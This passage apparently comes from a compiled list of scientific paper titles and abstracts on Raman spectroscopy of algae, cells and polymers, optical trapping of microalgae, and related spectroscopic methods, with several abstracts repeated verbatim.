those working outside the optical micro-manipulation field, to find new and interesting applications of these methods. --- paper_title: Polarized Raman study of random copolymers of propylene with olefins paper_content: The polarized Raman spectroscopy is employed in the study of structural modifications in the films of isotactic polypropylene (PP) whose chain contains ethylene, 1-butene, 1-hexene, 1-octene, and 4-metyl-pentene-1, which represents an isomer of 1-hexene. 
It is demonstrated that the phase and conformational compositions of copolymer molecules depend on the comonomer content and the side-chain length of the second monomer. The content of the PP molecules in the helical conformation in the crystalline and amorphous phases of the copolymers monotonically decreases with increasing content of the second monomer. The decrease in the content of helical macromolecules in the crystalline phase is faster than the decrease in the amorphous phase. At a certain content of comonomers, the total content of the helical fragments decreases with increasing length of the side chain of the second monomer. The structures and Raman spectra of the copolymers of propylene with 1-hexene and 4-methyl-1-pentene are similar. --- paper_title: The potential of Raman spectroscopy for the identification of biofilm formation by Staphylococcus epidermidis paper_content: We report on an investigation into a common problem in microbiology laboratories, which is associated with the difficulty of distinguishing/recognising different strains of the genus Staphylococcus. We demonstrate the potential of Raman spectroscopy as a rapid technique allowing for the identification of different isolates for the detection of biofilm-positive and biofilm-negative Staphylococcus epidermidis strains. For this, the recorded spectra were interpreted using the approach of principal component analysis (PCA). --- paper_title: In vivo Raman spectroscopy detects increased epidermal antioxidative potential with topically applied carotenoids paper_content: In the present study, the distribution of the carotenoids as a marker for the complete antioxidative potential in human skin was investigated before and after the topical application of carotenoids by in vivo Raman spectroscopy with an excitation wavelength of 785 nm. The carotenoid profile was assessed after a short term topical application in 4 healthy volunteers. In the untreated skin, the highest concentration of natural carotenoids was detected in different layers of the stratum corneum (SC) close to the skin surface. After topical application of carotenoids, an increase in the antioxidative potential in the skin could be observed. Topically applied carotenoids penetrate deep into the epidermis down to approximately 24 μm. This study supports the hypothesis that antioxidative substances are secreted via eccrine sweat glands and/or sebaceous glands to the skin surface. Subsequently they penetrate into the different layers of the SC. --- paper_title: The holographic optical micro-manipulation system based on counter-propagating beams paper_content: We present a system employing a dynamic diffractive optical element to control properties of two counter-propagating beams overlapping within a sample chamber. This system allows us to eliminate optical aberrations along both beam pathways and arbitrarily switch between various numbers of laser beams and their spatial profiles (i.e. Gaussian, Laguerre-Gaussian, Bessel beams, etc.). We successfully tested various counter-propagating dual-beam configurations including optical manipulation of both high and low index particles in water or air, particle delivery in an optical conveyor belt and the formation of colloidal solitons by optical binding.
Furthermore, we realized a novel optical mixer created by particles spiraling in counter-propagating interfering optical vortices and a new tool for optical tomography or localized spectroscopy enabling sterile contactless rotation and reorientation of a trapped living cell. --- paper_title: Raman Microspectroscopy of Individual Algal Cells: Sensing Unsaturation of Storage Lipids in vivo paper_content: Algae are becoming a strategic source of fuels, food, feedstocks, and biologically active compounds. This potential has stimulated the development of innovative analytical methods focused on these microorganisms. Algal lipids are among the most promising potential products for fuels as well as for nutrition. The crucial parameter characterizing the algal lipids is the degree of unsaturation of the constituent fatty acids quantified by the iodine value. Here we demonstrate the capacity of spatially resolved Raman microspectroscopy to determine the effective iodine value in lipid storage bodies of individual living algal cells. The Raman spectra were collected from three selected algal species immobilized in an agarose gel. Prior to immobilization, the algae were cultivated in the stationary phase inducing an overproduction of lipids. We employed the characteristic peaks in the Raman scattering spectra at 1,656 cm−1 (cis C═C stretching mode) and 1,445 cm−1 (CH2 scissoring mode) as the markers defining the ratio of unsaturated-to-saturated carbon-carbon bonds of the fatty acids in the algal lipids. These spectral features were first quantified for pure fatty acids of known iodine value. The resultant calibration curve was then used to calculate the effective iodine value of storage lipids in the living algal cells from their Raman spectra. We demonstrated that the iodine value differs significantly for the three studied algal species. Our spectroscopic estimations of the iodine value were validated using GC-MS measurements and an excellent agreement was found for the Trachydiscus minutus species. A good agreement was also found with the earlier published data on Botryococcus braunii. Thus, we propose that Raman microspectroscopy can become a technique of choice in the rapidly expanding field of algal biotechnology. --- paper_title: Investigation of denaturation of human serum albumin under action of cetyltrimethylammonium bromide by Raman spectroscopy paper_content: The mechanism of denaturation of human serum albumin (HSA) under the action of a cationic detergent, cetyltrimethylammonium bromide (CTAB), is investigated by the Raman spectroscopy method. The percentage content of α-helical segments in the polypeptide chain of HSA upon denaturation under the action of different concentrations of CTAB at different pH values is determined. It is shown that more intensive denaturation of HSA under the action of CTAB takes place at pH values larger than the isoelectric point of the protein (pI 4.7). --- paper_title: Monitoring of all hydrogen isotopologues at tritium laboratory Karlsruhe using Raman spectroscopy paper_content: We have recorded Raman spectra for all hydrogen isotopologues, using a CW Nd:YVO4 laser (5 W output power at 532 nm) and a high-throughput (f/1.8) spectrograph coupled to a Peltier-cooled (200 K) CCD-array detector (512 × 2048 pixels). A (static) gas cell was used in all measurements.
We investigated (i) “pure” fillings of the homonuclear isotopologues H2, D2, and T2; (ii) equilibrated binary fillings of H2 + D2, H2 + T2, and D2 + T2, thus providing the heteronuclear isotopologues HD, HT, and DT in a controlled manner; and (iii) general mixtures containing all isotopologues at varying concentration levels. Cell fillings within the total pressure range 13–985 mbar were studied, in order to determine the dynamic range of the Raman system and the detection limits for all isotopologues. Spectra were recorded for an accumulation period of 1000 s. The preliminary data evaluation was based on simple peak-height analysis of the ro-vibrational Q1-branches, yielding 3σ measurement sensitivities of 5 × 10−3, 7 × 10−3, and 25 × 10−3 mbar for the tritium-containing isotopologues T2, DT, and HT, respectively. These three isotopologues are the relevant ones for the KATRIN experiment and in the ITER fusion fuel cycle. While the measurement reported here were carried out with static-gas fillings, the cells are also ready for use with flowing-gas samples. --- paper_title: Characterization of oil-producing microalgae using Raman spectroscopy paper_content: Raman spectroscopy offers a powerful alternative analytical method for the detection and identification of lipids/oil in biological samples, such as algae and fish. Recent research in the authors' groups, and experimental data only very recently published by us and a few other groups suggest that Raman spectroscopy can be exploited in instances where fast and accurate determination of the iodine value (associated with the degree of lipid unsaturation) is required. Here the current status of Raman spectroscopy applications on algae is reviewed, and particular attention is given to the efforts of identifying and selecting oil-rich algal strains for the potential mass production of commercial biofuels and for utilization in the food industry. --- paper_title: Optical trapping of microalgae at 735-1064 nm: photodamage assessment. paper_content: Living microalgal cells differ from other cells that are used as objects for optical micromanipulation, in that they have strong light absorption in the visible range, and by the fact that their reaction centers are susceptible to photodamage. We trapped cells of the microalga Trachydiscus minutus using optical tweezers with laser wavelengths in the range from 735 nm to 1064 nm. The exposure to high photon flux density caused photodamage that was strongly wavelength dependent. The photochemical activity before and after exposure was assessed using a pulse amplitude modulation (PAM) technique. The photochemical activity was significantly and irreversibly suppressed by a 30s exposure to incident radiation at 735, 785, and 835 nm at a power of 25 mW. Irradiance at 885, 935 and 1064 nm had negligible effect at the same power. At a wavelength 1064 nm, a trapping power up to 218 mW caused no observable photodamage. --- paper_title: In vivo prediction of the nutrient status of individual microalgal cells using Raman microspectroscopy. paper_content: An in vivo method for predicting the nutrient status of individual algal cells using Raman microspectroscopy is described. Raman spectra of cells using 780 nm laser excitation show enhanced bands mainly attributable to chlorophyll a and beta-carotene. The relative intensities of chlorophyll a and beta-carotene bands changed under nitrogen limitation, with chlorophyll a bands becoming less intense and beta-carotene bands more prominent. 
Although spectra from N-replete and N-starved cell populations varied, each distribution was distinct enough such that multivariate classification methods, such as partial least squares discriminant analysis, could accurately predict the nutrient status of the cells from the Raman spectral data. --- paper_title: Micro-Raman spectroscopy of algae: Composition analysis and fluorescence background behavior paper_content: Preliminary feasibility studies were performed using Stokes Raman scattering for compositional analysis of algae. Two algal species, Chlorella sorokiniana (UTEX #1230) and Neochloris oleoabundans (UTEX #1185), were chosen for this study. Both species were considered to be candidates for biofuel production. Raman signals due to storage lipids (specifically triglycerides) were clearly identified in the nitrogen-starved C. sorokiniana and N. oleoabundans, but not in their healthy counterparts. On the other hand, signals resulting from the carotenoids were found to be present in all of the samples. Composition mapping was conducted in which Raman spectra were acquired from a dense sequence of locations over a small region of interest. The spectra obtained for the mapping images were filtered for the wavelengths of characteristic peaks that correspond to components of interest (i.e., triglyceride or carotenoid). The locations of the components of interest could be identified by the high intensity areas in the composition maps. Finally, the time evolution of fluorescence background was observed while acquiring Raman signals from the algae. The time dependence of fluorescence background is characterized by a general power law decay interrupted by sudden high intensity fluorescence events. The decreasing trend is likely a result of photo-bleaching of cell pigments due to prolonged intense laser exposure, while the sudden high intensity fluorescence events are not understood. --- paper_title: Raman Spectroscopy and Related Techniques in Biomedicine paper_content: In this review we describe label-free optical spectroscopy techniques which are able to non-invasively measure the (bio)chemistry in biological systems. Raman spectroscopy uses visible or near-infrared light to measure a spectrum of vibrational bonds in seconds. Coherent anti-Stokes Raman (CARS) microscopy and stimulated Raman loss (SRL) microscopy are orders of magnitude more efficient than Raman spectroscopy, and are able to acquire high quality chemically-specific images in seconds. We discuss the benefits and limitations of all techniques, with particular emphasis on applications in biomedicine—both in vivo (using fiber endoscopes) and in vitro (in optical microscopes). --- paper_title: Review Raman based imaging in biological application- a perspective paper_content: Imaging by means of Raman spectroscopy has emerged as a powerful technique in the study of various chemical processes occurring in biology. This technique is non-invasive, label-free, capable of providing molecular identity and can be performed in robust conditions. However, one major drawback is its inherently weak signal. The ways to overcome this issue are to use Raman-based methods, e.g. Resonance Raman Spectroscopy (RRS), Surface Enhanced Raman Spectroscopy (SERS), Tip Enhanced Raman Spectroscopy (TERS).
In this review, we give a brief introduction to all these methods, with special emphasis on their recent advances and applications in various fields of life science. --- paper_title: A Resonance Raman Method for the Rapid Detection and Identification of Algae in Water paper_content: Resonance Raman spectra are reported for aqueous suspensions of nine clones of marine plankton algae representing three classes, five genera, and seven species. Spectra are obtained easily either directly from culture or from samples concentrated by sedimentation. Spectra taken at 488 or 457.9 nm are of high quality and are sufficiently distinct to differentiate clones at the algal class level, and possibly also at the genus level. Strongest peaks occur near 1527 and 1158 cm−1 associated with ν(c = c) and ν(c – c) of carotenoid pigments, but information is contained in the entire region between 900 and 3000 cm−1 due to associated overtone and combination bands which can be assigned along with fundamental vibrations. Chlorophyll peaks also are quite pronounced. Spectra obtained using rapid flow techniques match those taken using slurries in sealed tubes if low laser power is used. The sensitivity and rapidity of the technique suggest that it may be useful in remote sensing applications. --- paper_title: Raman microspectroscopy of algal lipid bodies: β-carotene quantification paper_content: Advanced optical instruments can serve for analysis and manipulation of individual living cells and their internal structures. We have used Raman microspectroscopic analysis for assessment of β-carotene concentration in algal lipid bodies (LBs) in vivo. Some algae contain β-carotene in high amounts in their LBs, including strains which are considered useful in biotechnology for lipid and pigment production. We have devised a simple method to measure the concentration of β-carotene in a mixture of algal storage lipids from the ratio of their Raman vibrations. This finding may allow fast acquisition of β-carotene concentration, valuable, e.g., for Raman microspectroscopy-assisted cell sorting for selection of the overproducing strains. Furthermore, we demonstrate that β-carotene concentration can be proportional to LB volume and light intensity during the cultivation. We combine optical manipulation and analysis on a microfluidic platform in order to achieve fast, effective, and non-invasive sorting based on the spectroscopic features of the individual living cells. The resultant apparatus could find its use in demanding biotechnological applications such as selection of rare natural mutants or artificially modified cells resulting from genetic manipulations. --- paper_title: Raman Spectroscopy Cell-based Biosensors paper_content: One of the main challenges faced by biodetection systems is the ability to detect and identify a large range of toxins at low concentrations and in short times. Cell-based biosensors rely on detecting changes in cell behaviour, metabolism, or induction of cell death following exposure of live cells to toxic agents. Raman spectroscopy is a powerful technique for studying cellular biochemistry. Different toxic chemicals have different effects on living cells and induce different time-dependent biochemical changes related to cell death mechanisms. Cellular changes start with membrane receptor signalling leading to cytoplasmic shrinkage and nuclear fragmentation.
The potential advantage of Raman spectroscopy cell-based systems is that they are not engineered to respond specifically to a single toxic agent but are free to react to many biologically active compounds. Raman spectroscopy biosensors can also provide additional information from the time-dependent changes of cellular biochemistry. Since no cell labelling or staining is required, the specific time dependent biochemical changes in the living cells can be used for the identification and quantification of the toxic agents. Thus, detection of biochemical changes of cells by Raman spectroscopy could overcome the limitations of other biosensor techniques, with respect to detection and discrimination of a large range of toxic agents. Further developments of this technique may also include integration of cellular microarrays for high throughput in vitro toxicological testing of pharmaceuticals and in situ monitoring of the growth of engineered tissues. --- paper_title: Emerging concepts in deep Raman spectroscopy of biological tissue. paper_content: This article reviews emerging Raman techniques for deep, non-invasive characterisation of biological tissues. As generic analytical tools, the new methods pave the way for a host of new applications including non-invasive bone disease diagnosis, chemical characterisation of 'stone-like' materials in urology and cancer detection in a number of organs. --- paper_title: Raman Spectroscopy of Algae: A Review paper_content: Algae are eukaryotic microorganisms which contain chlorophyll and are capable of photosynthesis. In various studies, Raman spectra have been used to identify a particular genus in a group of different types of algae. Each biomolecule has its own signature Raman spectrum. This characteristic signal can be used to identify and characterize the biomolecules in algae. Raman spectrum can be used to identify the components, determine the molecular structure and various properties of biomolecules in algae. With this view, this work presents a comprehensive review of current practices and advancements in Raman spectroscopy of Algae as well as in Raman spectroscopy of component biomolecules of different genus of Algae. --- paper_title: Effects of pre-processing of Raman spectra onin vivo classification of nutrient status of microalgal cells paper_content: Raman spectra were obtained from cells of the chlorophyte unicellular eukaryotic alga Dunaliella tertiolecta, which had been grown either under nutrient-replete conditions or starved of nitrogen for 4 days. Spectra were rich in bands which could all be attributed to either chlorophyll a or β-carotene. A cursory examination of the differences between the spectra of replete and starved cells indicated a decline in chlorophyll a and an increase in β-carotene in chlorophytes. Unprocessed spectra showed pronounced baseline effects. A variety of pre-processing techniques were used in an attempt to visualise the spectral, and hence chemical, differences in the transformed data and perform classification based upon these differences. Six types of spectral pre-processing were compared: baseline correction with vector normalisation; Multiplicative Scatter Correction (MSC), Extended Multiplicative Signal Correction (EMSC); Standard Normal Variate (SNV); and vector normalised 1st and 2nd derivative spectra. Results for Soft Independent Modelling of Class Analogy (SIMCA) and Partial Least Squares (PLS) discriminant analysis were compared. 
All pre-processing methods allowed spectral differences between N-replete and N-starved spectra to be visualised, with derivatives and EMSC scoring the lowest RMSEC and RMSEV values with PLS and also the best overall classification results. SIMCA was not suited to classifying the nutrient classes under any of the pre-treatments, due to the small model distances involved. --- paper_title: Raman Microspectroscopy of Individual Algal Cells: Sensing Unsaturation of Storage Lipids in vivo paper_content: Algae are becoming a strategic source of fuels, food, feedstocks, and biologically active compounds. This potential has stimulated the development of innovative analytical methods focused on these microorganisms. Algal lipids are among the most promising potential products for fuels as well as for nutrition. The crucial parameter characterizing the algal lipids is the degree of unsaturation of the constituent fatty acids quantified by the iodine value. Here we demonstrate the capacity of the spatially resolved Raman microspectroscopy to determine the effective iodine value in lipid storage bodies of individual living algal cells. The Raman spectra were collected from three selected algal species immobilized in an agarose gel. Prior to immobilization, the algae were cultivated in the stationary phase inducing an overproduction of lipids. We employed the characteristic peaks in the Raman scattering spectra at 1,656 cm−1 (cis C═C stretching mode) and 1,445 cm−1 (CH2 scissoring mode) as the markers defining the ratio of unsaturated-to-saturated carbon-carbon bonds of the fatty acids in the algal lipids. These spectral features were first quantified for pure fatty acids of known iodine value. The resultant calibration curve was then used to calculate the effective iodine value of storage lipids in the living algal cells from their Raman spectra. We demonstrated that the iodine value differs significantly for the three studied algal species. Our spectroscopic estimations of the iodine value were validated using GC-MS measurements and an excellent agreement was found for the Trachydiscus minutus species. A good agreement was also found with the earlier published data on Botryococcus braunii. Thus, we propose that Raman microspectroscopy can become technique of choice in the rapidly expanding field of algal biotechnology. --- paper_title: Raman Spectroscopy Analysis of Botryococcene Hydrocarbons from the Green MicroalgaBotryococcus braunii paper_content: Abstract Botryococcus braunii, B race is a unique green microalga that produces large amounts of liquid hydrocarbons known as botryococcenes that can be used as a fuel for internal combustion engines. The simplest botryococcene (C30) is metabolized by methylation to give intermediates of C31, C32, C33, and C34, with C34 being the predominant botryococcene in some strains. In the present work we have used Raman spectroscopy to characterize the structure of botryococcenes in an attempt to identify and localize botryococcenes within B. braunii cells. The spectral region from 1600–1700 cm−1 showed ν(C=C) stretching bands specific for botryococcenes. Distinct botryococcene Raman bands at 1640 and 1647 cm−1 were assigned to the stretching of the C=C bond in the botryococcene branch and the exomethylene C=C bonds produced by the methylations, respectively. A Raman band at 1670 cm−1 was assigned to the backbone C=C bond stretching. 
Density function theory calculations were used to determine the Raman spectra of all botryococcenes to compare computed theoretical values with those observed. The analysis showed that the ν(C=C) stretching bands at 1647 and 1670 cm−1 are actually composed of several closely spaced bands arising from the six individual C=C bonds in the molecule. We also used confocal Raman microspectroscopy to map the presence and location of methylated botryococcenes within a colony of B. braunii cells based on the methylation-specific 1647 cm−1 botryococcene Raman shift. --- paper_title: In vivo lipidomics using single-cell Raman spectroscopy paper_content: We describe a method for direct, quantitative, in vivo lipid profiling of oil-producing microalgae using single-cell laser-trapping Raman spectroscopy. This approach is demonstrated in the quantitative determination of the degree of unsaturation and transition temperatures of constituent lipids within microalgae. These properties are important markers for determining engine compatibility and performance metrics of algal biodiesel. We show that these factors can be directly measured from a single living microalgal cell held in place with an optical trap while simultaneously collecting Raman data. Cellular response to different growth conditions is monitored in real time. Our approach circumvents the need for lipid extraction and analysis that is both slow and invasive. Furthermore, this technique yields real-time chemical information in a label-free manner, thus eliminating the limitations of impermeability, toxicity, and specificity of the fluorescent probes common in currently used protocols. Although the single-cell Raman spectroscopy demonstrated here is focused on the study of the microalgal lipids with biofuel applications, the analytical capability and quantitation algorithms demonstrated are applicable to many different organisms and should prove useful for a diverse range of applications in lipidomics. --- paper_title: In vivo prediction of the nutrient status of individual microalgal cells using Raman microspectroscopy. paper_content: An in vivo method for predicting the nutrient status of individual algal cells using Raman microspectroscopy is described. Raman spectra of cells using 780 nm laser excitation show enhanced bands mainly attributable to chlorophyll a and beta-carotene. The relative intensities of chlorophyll a and beta-carotene bands changed under nitrogen limitation, with chlorophyll a bands becoming less intense and beta-carotene bands more prominent. Although spectra from N-replete and N-starved cell populations varied, each distribution was distinct enough such that multivariate classification methods, such as partial least squares discriminant analysis, could accurately predict the nutrient status of the cells from the Raman spectral data. --- paper_title: Micro-Raman spectroscopy of algae: Composition analysis and fluorescence background behavior paper_content: Preliminary feasibility studies were performed using Stokes Raman scattering for compositional analysis of algae. Two algal species, Chlorella sorokiniana (UTEX #1230) and Neochloris oleoabundans (UTEX #1185), were chosen for this study. Both species were considered to be candidates for biofuel production. Raman signals due to storage lipids (specifically triglycerides) were clearly identified in the nitrogen-starved C. sorokiniana and N. oleoabundans, but not in their healthy counterparts. 
On the other hand, signals resulting from the carotenoids were found to be present in all of the samples. Composition mapping was conducted in which Raman spectra were acquired from a dense sequence of locations over a small region of interest. The spectra obtained for the mapping images were filtered for the wavelengths of characteristic peaks that correspond to components of interest (i.e., triglyceride or carotenoid). The locations of the components of interest could be identified by the high intensity areas in the composition maps. Finally, the time evolution of fluorescence background was observed while acquiring Raman signals from the algae. The time dependence of fluorescence background is characterized by a general power law decay interrupted by sudden high intensity fluorescence events. The decreasing trend is likely a result of photo-bleaching of cell pigments due to prolonged intense laser exposure, while the sudden high intensity fluorescence events are not understood. --- paper_title: Effects of pre-processing of Raman spectra onin vivo classification of nutrient status of microalgal cells paper_content: Raman spectra were obtained from cells of the chlorophyte unicellular eukaryotic alga Dunaliella tertiolecta, which had been grown either under nutrient-replete conditions or starved of nitrogen for 4 days. Spectra were rich in bands which could all be attributed to either chlorophyll a or β-carotene. A cursory examination of the differences between the spectra of replete and starved cells indicated a decline in chlorophyll a and an increase in β-carotene in chlorophytes. Unprocessed spectra showed pronounced baseline effects. A variety of pre-processing techniques were used in an attempt to visualise the spectral, and hence chemical, differences in the transformed data and perform classification based upon these differences. Six types of spectral pre-processing were compared: baseline correction with vector normalisation; Multiplicative Scatter Correction (MSC), Extended Multiplicative Signal Correction (EMSC); Standard Normal Variate (SNV); and vector normalised 1st and 2nd derivative spectra. Results for Soft Independent Modelling of Class Analogy (SIMCA) and Partial Least Squares (PLS) discriminant analysis were compared. All pre-processing methods allowed spectral differences between N-replete and N-starved spectra to be visualised, with derivatives and EMSC scoring the lowest RMSEC and RMSEV values with PLS and also the best overall classification results. SIMCA was not suited to classifying the nutrient classes under any of the pre-treatments, due to the small model distances involved. --- paper_title: Raman Spectroscopy Analysis of Botryococcene Hydrocarbons from the Green MicroalgaBotryococcus braunii paper_content: Abstract Botryococcus braunii, B race is a unique green microalga that produces large amounts of liquid hydrocarbons known as botryococcenes that can be used as a fuel for internal combustion engines. The simplest botryococcene (C30) is metabolized by methylation to give intermediates of C31, C32, C33, and C34, with C34 being the predominant botryococcene in some strains. In the present work we have used Raman spectroscopy to characterize the structure of botryococcenes in an attempt to identify and localize botryococcenes within B. braunii cells. The spectral region from 1600–1700 cm−1 showed ν(C=C) stretching bands specific for botryococcenes. 
Distinct botryococcene Raman bands at 1640 and 1647 cm−1 were assigned to the stretching of the C=C bond in the botryococcene branch and the exomethylene C=C bonds produced by the methylations, respectively. A Raman band at 1670 cm−1 was assigned to the backbone C=C bond stretching. Density function theory calculations were used to determine the Raman spectra of all botryococcenes to compare computed theoretical values with those observed. The analysis showed that the ν(C=C) stretching bands at 1647 and 1670 cm−1 are actually composed of several closely spaced bands arising from the six individual C=C bonds in the molecule. We also used confocal Raman microspectroscopy to map the presence and location of methylated botryococcenes within a colony of B. braunii cells based on the methylation-specific 1647 cm−1 botryococcene Raman shift. --- paper_title: In vivo lipidomics using single-cell Raman spectroscopy paper_content: We describe a method for direct, quantitative, in vivo lipid profiling of oil-producing microalgae using single-cell laser-trapping Raman spectroscopy. This approach is demonstrated in the quantitative determination of the degree of unsaturation and transition temperatures of constituent lipids within microalgae. These properties are important markers for determining engine compatibility and performance metrics of algal biodiesel. We show that these factors can be directly measured from a single living microalgal cell held in place with an optical trap while simultaneously collecting Raman data. Cellular response to different growth conditions is monitored in real time. Our approach circumvents the need for lipid extraction and analysis that is both slow and invasive. Furthermore, this technique yields real-time chemical information in a label-free manner, thus eliminating the limitations of impermeability, toxicity, and specificity of the fluorescent probes common in currently used protocols. Although the single-cell Raman spectroscopy demonstrated here is focused on the study of the microalgal lipids with biofuel applications, the analytical capability and quantitation algorithms demonstrated are applicable to many different organisms and should prove useful for a diverse range of applications in lipidomics. --- paper_title: In vivo prediction of the nutrient status of individual microalgal cells using Raman microspectroscopy. paper_content: An in vivo method for predicting the nutrient status of individual algal cells using Raman microspectroscopy is described. Raman spectra of cells using 780 nm laser excitation show enhanced bands mainly attributable to chlorophyll a and beta-carotene. The relative intensities of chlorophyll a and beta-carotene bands changed under nitrogen limitation, with chlorophyll a bands becoming less intense and beta-carotene bands more prominent. Although spectra from N-replete and N-starved cell populations varied, each distribution was distinct enough such that multivariate classification methods, such as partial least squares discriminant analysis, could accurately predict the nutrient status of the cells from the Raman spectral data. --- paper_title: Micro-Raman spectroscopy of algae: Composition analysis and fluorescence background behavior paper_content: Preliminary feasibility studies were performed using Stokes Raman scattering for compositional analysis of algae. Two algal species, Chlorella sorokiniana (UTEX #1230) and Neochloris oleoabundans (UTEX #1185), were chosen for this study. 
Both species were considered to be candidates for biofuel production. Raman signals due to storage lipids (specifically triglycerides) were clearly identified in the nitrogen-starved C. sorokiniana and N. oleoabundans, but not in their healthy counterparts. On the other hand, signals resulting from the carotenoids were found to be present in all of the samples. Composition mapping was conducted in which Raman spectra were acquired from a dense sequence of locations over a small region of interest. The spectra obtained for the mapping images were filtered for the wavelengths of characteristic peaks that correspond to components of interest (i.e., triglyceride or carotenoid). The locations of the components of interest could be identified by the high intensity areas in the composition maps. Finally, the time evolution of fluorescence background was observed while acquiring Raman signals from the algae. The time dependence of fluorescence background is characterized by a general power law decay interrupted by sudden high intensity fluorescence events. The decreasing trend is likely a result of photo-bleaching of cell pigments due to prolonged intense laser exposure, while the sudden high intensity fluorescence events are not understood. --- paper_title: Effects of pre-processing of Raman spectra onin vivo classification of nutrient status of microalgal cells paper_content: Raman spectra were obtained from cells of the chlorophyte unicellular eukaryotic alga Dunaliella tertiolecta, which had been grown either under nutrient-replete conditions or starved of nitrogen for 4 days. Spectra were rich in bands which could all be attributed to either chlorophyll a or β-carotene. A cursory examination of the differences between the spectra of replete and starved cells indicated a decline in chlorophyll a and an increase in β-carotene in chlorophytes. Unprocessed spectra showed pronounced baseline effects. A variety of pre-processing techniques were used in an attempt to visualise the spectral, and hence chemical, differences in the transformed data and perform classification based upon these differences. Six types of spectral pre-processing were compared: baseline correction with vector normalisation; Multiplicative Scatter Correction (MSC), Extended Multiplicative Signal Correction (EMSC); Standard Normal Variate (SNV); and vector normalised 1st and 2nd derivative spectra. Results for Soft Independent Modelling of Class Analogy (SIMCA) and Partial Least Squares (PLS) discriminant analysis were compared. All pre-processing methods allowed spectral differences between N-replete and N-starved spectra to be visualised, with derivatives and EMSC scoring the lowest RMSEC and RMSEV values with PLS and also the best overall classification results. SIMCA was not suited to classifying the nutrient classes under any of the pre-treatments, due to the small model distances involved. --- paper_title: Raman Microspectroscopy of Individual Algal Cells: Sensing Unsaturation of Storage Lipids in vivo paper_content: Algae are becoming a strategic source of fuels, food, feedstocks, and biologically active compounds. This potential has stimulated the development of innovative analytical methods focused on these microorganisms. Algal lipids are among the most promising potential products for fuels as well as for nutrition. The crucial parameter characterizing the algal lipids is the degree of unsaturation of the constituent fatty acids quantified by the iodine value. 
Here we demonstrate the capacity of the spatially resolved Raman microspectroscopy to determine the effective iodine value in lipid storage bodies of individual living algal cells. The Raman spectra were collected from three selected algal species immobilized in an agarose gel. Prior to immobilization, the algae were cultivated in the stationary phase inducing an overproduction of lipids. We employed the characteristic peaks in the Raman scattering spectra at 1,656 cm−1 (cis C═C stretching mode) and 1,445 cm−1 (CH2 scissoring mode) as the markers defining the ratio of unsaturated-to-saturated carbon-carbon bonds of the fatty acids in the algal lipids. These spectral features were first quantified for pure fatty acids of known iodine value. The resultant calibration curve was then used to calculate the effective iodine value of storage lipids in the living algal cells from their Raman spectra. We demonstrated that the iodine value differs significantly for the three studied algal species. Our spectroscopic estimations of the iodine value were validated using GC-MS measurements and an excellent agreement was found for the Trachydiscus minutus species. A good agreement was also found with the earlier published data on Botryococcus braunii. Thus, we propose that Raman microspectroscopy can become technique of choice in the rapidly expanding field of algal biotechnology. --- paper_title: Raman Spectroscopy Analysis of Botryococcene Hydrocarbons from the Green MicroalgaBotryococcus braunii paper_content: Abstract Botryococcus braunii, B race is a unique green microalga that produces large amounts of liquid hydrocarbons known as botryococcenes that can be used as a fuel for internal combustion engines. The simplest botryococcene (C30) is metabolized by methylation to give intermediates of C31, C32, C33, and C34, with C34 being the predominant botryococcene in some strains. In the present work we have used Raman spectroscopy to characterize the structure of botryococcenes in an attempt to identify and localize botryococcenes within B. braunii cells. The spectral region from 1600–1700 cm−1 showed ν(C=C) stretching bands specific for botryococcenes. Distinct botryococcene Raman bands at 1640 and 1647 cm−1 were assigned to the stretching of the C=C bond in the botryococcene branch and the exomethylene C=C bonds produced by the methylations, respectively. A Raman band at 1670 cm−1 was assigned to the backbone C=C bond stretching. Density function theory calculations were used to determine the Raman spectra of all botryococcenes to compare computed theoretical values with those observed. The analysis showed that the ν(C=C) stretching bands at 1647 and 1670 cm−1 are actually composed of several closely spaced bands arising from the six individual C=C bonds in the molecule. We also used confocal Raman microspectroscopy to map the presence and location of methylated botryococcenes within a colony of B. braunii cells based on the methylation-specific 1647 cm−1 botryococcene Raman shift. --- paper_title: In vivo lipidomics using single-cell Raman spectroscopy paper_content: We describe a method for direct, quantitative, in vivo lipid profiling of oil-producing microalgae using single-cell laser-trapping Raman spectroscopy. This approach is demonstrated in the quantitative determination of the degree of unsaturation and transition temperatures of constituent lipids within microalgae. These properties are important markers for determining engine compatibility and performance metrics of algal biodiesel. 
We show that these factors can be directly measured from a single living microalgal cell held in place with an optical trap while simultaneously collecting Raman data. Cellular response to different growth conditions is monitored in real time. Our approach circumvents the need for lipid extraction and analysis that is both slow and invasive. Furthermore, this technique yields real-time chemical information in a label-free manner, thus eliminating the limitations of impermeability, toxicity, and specificity of the fluorescent probes common in currently used protocols. Although the single-cell Raman spectroscopy demonstrated here is focused on the study of the microalgal lipids with biofuel applications, the analytical capability and quantitation algorithms demonstrated are applicable to many different organisms and should prove useful for a diverse range of applications in lipidomics. --- paper_title: In vivo prediction of the nutrient status of individual microalgal cells using Raman microspectroscopy. paper_content: An in vivo method for predicting the nutrient status of individual algal cells using Raman microspectroscopy is described. Raman spectra of cells using 780 nm laser excitation show enhanced bands mainly attributable to chlorophyll a and beta-carotene. The relative intensities of chlorophyll a and beta-carotene bands changed under nitrogen limitation, with chlorophyll a bands becoming less intense and beta-carotene bands more prominent. Although spectra from N-replete and N-starved cell populations varied, each distribution was distinct enough such that multivariate classification methods, such as partial least squares discriminant analysis, could accurately predict the nutrient status of the cells from the Raman spectral data. --- paper_title: Chemometric prediction of alginate monomer composition: A comparative spectroscopic study using IR, Raman, NIR and NMR paper_content: Abstract The potential of using infrared (IR), Raman and near infrared (NIR) spectroscopy combined with chemometrics for reliable and rapid determination of the ratio of mannuronic and guluronic acid (M/G ratio) in commercial sodium alginate powders has been investigated. The reference method for quantification of the M/G ratio was solution-state 1 H nuclear magnetic resonance (NMR) spectroscopy. For a set of 100 commercial alginate powders with a M/G ratio range of 0.5–2.1 quantitative calibrations using partial least squares regression (PLSR) were developed and compared for the three spectroscopic methods. All three spectroscopic methods yielded models with prediction errors (RMSEP) of 0.08 and correlation coefficients between 0.96 and 0.97. However, the model based on extended inverted signal corrected (EISC) Raman spectra stood out by only using one PLS component for the prediction. The results are comparable to that of the experimental error of the reference method estimated to be between 0.01 and 0.08. --- paper_title: Application of laser-induced breakdown spectroscopy to the analysis of algal biomass for industrial biotechnology paper_content: Abstract We report on the application of laser-induced breakdown spectroscopy (LIBS) to the determination of elements distinctive in terms of their biological significance (such as potassium, magnesium, calcium, and sodium) and to the monitoring of accumulation of potentially toxic heavy metal ions in living microorganisms (algae), in order to trace e.g. 
